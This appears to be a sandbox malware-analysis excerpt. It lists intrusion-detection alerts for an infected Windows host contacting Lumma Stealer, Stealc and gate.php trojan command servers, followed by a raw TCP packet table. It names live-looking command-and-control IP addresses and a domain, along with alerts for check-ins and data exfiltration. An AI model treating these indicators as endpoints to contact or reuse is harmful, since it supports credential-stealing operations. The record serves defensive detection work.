2024-12-12T16:50:04.464069+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50150	185.81.68.147	80	TCP
2024-12-12T16:50:04.464069+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50150	185.81.68.147	80	TCP
2024-12-12T16:50:04.464069+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50150	185.81.68.147	80	TCP
2024-12-12T16:50:06.015974+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50156	185.81.68.147	80	TCP
2024-12-12T16:50:06.015974+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50156	185.81.68.147	80	TCP
2024-12-12T16:50:06.015974+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50156	185.81.68.147	80	TCP
2024-12-12T16:50:08.068063+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50165	185.81.68.147	80	TCP
2024-12-12T16:50:08.068063+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50165	185.81.68.147	80	TCP
2024-12-12T16:50:08.068063+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50165	185.81.68.147	80	TCP
2024-12-12T16:50:08.956599+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50164	185.81.68.147	80	TCP
2024-12-12T16:50:08.956599+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50164	185.81.68.147	80	TCP
2024-12-12T16:50:08.956599+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50164	185.81.68.147	80	TCP
2024-12-12T16:50:09.269536+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50174	185.81.68.147	80	TCP
2024-12-12T16:50:09.269536+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50174	185.81.68.147	80	TCP
2024-12-12T16:50:09.269536+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50174	185.81.68.147	80	TCP
2024-12-12T16:50:09.904036+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50176	185.81.68.147	80	TCP
2024-12-12T16:50:09.904036+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50176	185.81.68.147	80	TCP
2024-12-12T16:50:09.904036+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50176	185.81.68.147	80	TCP
2024-12-12T16:50:11.742161+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50182	185.81.68.147	80	TCP
2024-12-12T16:50:11.742161+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50182	185.81.68.147	80	TCP
2024-12-12T16:50:11.742161+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50182	185.81.68.147	80	TCP
2024-12-12T16:50:13.465562+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50184	185.81.68.147	80	TCP
2024-12-12T16:50:13.465562+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50184	185.81.68.147	80	TCP
2024-12-12T16:50:13.465562+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50184	185.81.68.147	80	TCP
2024-12-12T16:50:15.152143+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50192	185.81.68.147	80	TCP
2024-12-12T16:50:15.152143+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50192	185.81.68.147	80	TCP
2024-12-12T16:50:15.152143+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50192	185.81.68.147	80	TCP
2024-12-12T16:50:17.071221+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50195	185.81.68.147	80	TCP
2024-12-12T16:50:17.071221+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50195	185.81.68.147	80	TCP
2024-12-12T16:50:17.071221+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50195	185.81.68.147	80	TCP
2024-12-12T16:50:19.044987+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50196	185.81.68.147	80	TCP
2024-12-12T16:50:19.044987+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50196	185.81.68.147	80	TCP
2024-12-12T16:50:19.044987+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50196	185.81.68.147	80	TCP
2024-12-12T16:50:20.988187+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50202	185.81.68.147	80	TCP
2024-12-12T16:50:20.988187+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50202	185.81.68.147	80	TCP
2024-12-12T16:50:20.988187+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50202	185.81.68.147	80	TCP
2024-12-12T16:50:22.890926+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50207	185.81.68.147	80	TCP
2024-12-12T16:50:22.890926+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50207	185.81.68.147	80	TCP
2024-12-12T16:50:22.890926+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50207	185.81.68.147	80	TCP
2024-12-12T16:50:24.214168+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.10	50205	185.215.113.206	80	TCP
2024-12-12T16:50:24.882642+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50221	185.81.68.147	80	TCP
2024-12-12T16:50:24.882642+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50221	185.81.68.147	80	TCP
2024-12-12T16:50:24.882642+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50221	185.81.68.147	80	TCP
2024-12-12T16:50:26.627266+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50233	185.81.68.147	80	TCP
2024-12-12T16:50:26.627266+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50233	185.81.68.147	80	TCP
2024-12-12T16:50:26.627266+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50233	185.81.68.147	80	TCP
2024-12-12T16:50:26.874704+0100	2058159	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fightlsoser .click)	1	192.168.2.10	59721	1.1.1.1	53	UDP
2024-12-12T16:50:27.130932+0100	2058159	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fightlsoser .click)	1	192.168.2.10	59721	1.1.1.1	53	UDP
2024-12-12T16:50:28.320557+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50243	185.81.68.147	80	TCP
2024-12-12T16:50:28.320557+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50243	185.81.68.147	80	TCP
2024-12-12T16:50:28.320557+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50243	185.81.68.147	80	TCP
2024-12-12T16:50:28.617180+0100	2058160	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)	1	192.168.2.10	50238	172.67.213.48	443	TCP
2024-12-12T16:50:28.617180+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50238	172.67.213.48	443	TCP
2024-12-12T16:50:29.760539+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.10	50238	172.67.213.48	443	TCP
2024-12-12T16:50:29.760539+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.10	50238	172.67.213.48	443	TCP
2024-12-12T16:50:30.297076+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50254	185.81.68.147	80	TCP
2024-12-12T16:50:30.297076+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50254	185.81.68.147	80	TCP
2024-12-12T16:50:30.297076+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50254	185.81.68.147	80	TCP
2024-12-12T16:50:32.183845+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50258	185.81.68.147	80	TCP
2024-12-12T16:50:32.183845+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50258	185.81.68.147	80	TCP
2024-12-12T16:50:32.183845+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50258	185.81.68.147	80	TCP
2024-12-12T16:50:32.280880+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.10	50255	185.215.113.206	80	TCP
2024-12-12T16:50:33.485834+0100	2058160	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)	1	192.168.2.10	50259	172.67.213.48	443	TCP
2024-12-12T16:50:33.485834+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50259	172.67.213.48	443	TCP
2024-12-12T16:50:34.064096+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50261	185.81.68.147	80	TCP
2024-12-12T16:50:34.064096+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50261	185.81.68.147	80	TCP
2024-12-12T16:50:34.064096+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50261	185.81.68.147	80	TCP
2024-12-12T16:50:34.198263+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.10	50259	172.67.213.48	443	TCP
2024-12-12T16:50:34.198263+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.10	50259	172.67.213.48	443	TCP
2024-12-12T16:50:35.808854+0100	2058160	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)	1	192.168.2.10	50263	172.67.213.48	443	TCP
2024-12-12T16:50:35.808854+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50263	172.67.213.48	443	TCP
2024-12-12T16:50:35.876600+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50265	185.81.68.147	80	TCP
2024-12-12T16:50:35.876600+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50265	185.81.68.147	80	TCP
2024-12-12T16:50:35.876600+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50265	185.81.68.147	80	TCP
2024-12-12T16:50:37.750819+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50268	185.81.68.147	80	TCP
2024-12-12T16:50:37.750819+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50268	185.81.68.147	80	TCP
2024-12-12T16:50:37.750819+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50268	185.81.68.147	80	TCP
2024-12-12T16:50:37.870851+0100	2058160	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)	1	192.168.2.10	50267	172.67.213.48	443	TCP
2024-12-12T16:50:37.870851+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50267	172.67.213.48	443	TCP
2024-12-12T16:50:39.014059+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.10	50267	172.67.213.48	443	TCP
2024-12-12T16:50:39.704101+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50272	185.81.68.147	80	TCP
2024-12-12T16:50:39.704101+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50272	185.81.68.147	80	TCP
2024-12-12T16:50:39.704101+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50272	185.81.68.147	80	TCP
2024-12-12T16:50:40.450539+0100	2058160	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)	1	192.168.2.10	50271	172.67.213.48	443	TCP
2024-12-12T16:50:40.450539+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50271	172.67.213.48	443	TCP
2024-12-12T16:50:41.581306+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50275	185.81.68.147	80	TCP
2024-12-12T16:50:41.581306+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50275	185.81.68.147	80	TCP
2024-12-12T16:50:41.581306+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50275	185.81.68.147	80	TCP
2024-12-12T16:50:43.338354+0100	2058160	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)	1	192.168.2.10	50284	172.67.213.48	443	TCP
2024-12-12T16:50:43.338354+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50284	172.67.213.48	443	TCP
2024-12-12T16:50:43.584964+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50288	185.81.68.147	80	TCP
2024-12-12T16:50:43.584964+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50288	185.81.68.147	80	TCP
2024-12-12T16:50:43.584964+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50288	185.81.68.147	80	TCP
2024-12-12T16:50:45.346981+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50294	185.81.68.147	80	TCP
2024-12-12T16:50:45.346981+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50294	185.81.68.147	80	TCP
2024-12-12T16:50:45.346981+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50294	185.81.68.147	80	TCP
2024-12-12T16:50:47.034246+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50296	185.81.68.147	80	TCP
2024-12-12T16:50:47.034246+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50296	185.81.68.147	80	TCP
2024-12-12T16:50:47.034246+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50296	185.81.68.147	80	TCP
2024-12-12T16:50:48.854420+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50300	185.81.68.147	80	TCP
2024-12-12T16:50:48.854420+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50300	185.81.68.147	80	TCP
2024-12-12T16:50:48.854420+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50300	185.81.68.147	80	TCP
2024-12-12T16:50:49.617379+0100	2058160	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)	1	192.168.2.10	50299	172.67.213.48	443	TCP
2024-12-12T16:50:49.617379+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50299	172.67.213.48	443	TCP
2024-12-12T16:50:50.537748+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50302	185.81.68.147	80	TCP
2024-12-12T16:50:50.537748+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50302	185.81.68.147	80	TCP
2024-12-12T16:50:50.537748+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50302	185.81.68.147	80	TCP
2024-12-12T16:50:50.833525+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.10	50299	172.67.213.48	443	TCP
2024-12-12T16:50:52.161845+0100	2058160	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)	1	192.168.2.10	50308	172.67.213.48	443	TCP
2024-12-12T16:50:52.161845+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50308	172.67.213.48	443	TCP
2024-12-12T16:50:52.370878+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50311	185.81.68.147	80	TCP
2024-12-12T16:50:52.370878+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50311	185.81.68.147	80	TCP
2024-12-12T16:50:52.370878+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50311	185.81.68.147	80	TCP
2024-12-12T16:50:52.876874+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.10	50308	172.67.213.48	443	TCP
2024-12-12T16:50:54.079049+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50316	185.81.68.147	80	TCP
2024-12-12T16:50:54.079049+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50316	185.81.68.147	80	TCP
2024-12-12T16:50:54.079049+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50316	185.81.68.147	80	TCP
2024-12-12T16:50:55.996365+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50319	185.81.68.147	80	TCP
2024-12-12T16:50:55.996365+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50319	185.81.68.147	80	TCP
2024-12-12T16:50:55.996365+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50319	185.81.68.147	80	TCP
2024-12-12T16:50:57.999225+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50329	185.81.68.147	80	TCP
2024-12-12T16:50:57.999225+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50329	185.81.68.147	80	TCP
2024-12-12T16:50:57.999225+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50329	185.81.68.147	80	TCP
2024-12-12T16:50:59.837977+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50330	185.81.68.147	80	TCP
2024-12-12T16:50:59.837977+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50330	185.81.68.147	80	TCP
2024-12-12T16:50:59.837977+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50330	185.81.68.147	80	TCP
2024-12-12T16:51:01.617885+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50332	185.81.68.147	80	TCP
2024-12-12T16:51:01.617885+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50332	185.81.68.147	80	TCP
2024-12-12T16:51:01.617885+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50332	185.81.68.147	80	TCP
2024-12-12T16:51:07.739107+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50337	185.81.68.147	80	TCP
2024-12-12T16:51:07.739107+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50337	185.81.68.147	80	TCP
2024-12-12T16:51:07.739107+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50337	185.81.68.147	80	TCP
2024-12-12T16:51:09.658808+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50339	185.81.68.147	80	TCP
2024-12-12T16:51:09.658808+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50339	185.81.68.147	80	TCP
2024-12-12T16:51:09.658808+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50339	185.81.68.147	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 16:48:05.323788881 CET	49848	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:05.443667889 CET	80	49848	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:05.446244955 CET	49848	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:05.446523905 CET	49848	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:05.566294909 CET	80	49848	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:06.778474092 CET	80	49848	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:06.778525114 CET	49848	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:08.292265892 CET	49848	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:08.292612076 CET	49856	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:08.412513971 CET	80	49856	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:08.412600040 CET	80	49848	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:08.413150072 CET	49856	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:08.413150072 CET	49856	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:08.413289070 CET	49848	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:08.532957077 CET	80	49856	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:09.786029100 CET	80	49856	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:09.786041021 CET	80	49856	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:09.786204100 CET	49856	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:09.790427923 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:09.910229921 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:09.910548925 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:09.910969973 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:10.031380892 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.236073017 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.236115932 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.236128092 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.236258984 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.236269951 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.236280918 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.236304998 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.236304998 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.236304998 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.236347914 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.236366987 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.236375093 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.236381054 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.236448050 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.236664057 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.236664057 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.236664057 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.356235981 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.356332064 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.356353998 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.356595993 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.360479116 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.360538960 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.360563040 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.360590935 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.428339005 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.428472996 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.428524017 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.428524017 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.432656050 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.432707071 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.432742119 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.432806015 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.440970898 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.441070080 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.441071987 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.441709042 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.449525118 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.449639082 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.449738979 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.449738979 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.457988977 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.458067894 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.458076000 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.458177090 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.466394901 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.466444969 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.466480970 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.467314959 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.474716902 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.474780083 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.475164890 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.475164890 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.483006954 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.483104944 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.483206987 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.491422892 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.491508007 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.491523981 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.491569996 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.499799967 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.499885082 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.499886036 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.500413895 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.507483959 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.507617950 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.507625103 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.507807016 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.515234947 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.515280962 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.515491962 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.620639086 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.620928049 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.620932102 CET	80	49858	31.41.244.11	192.168.2.10
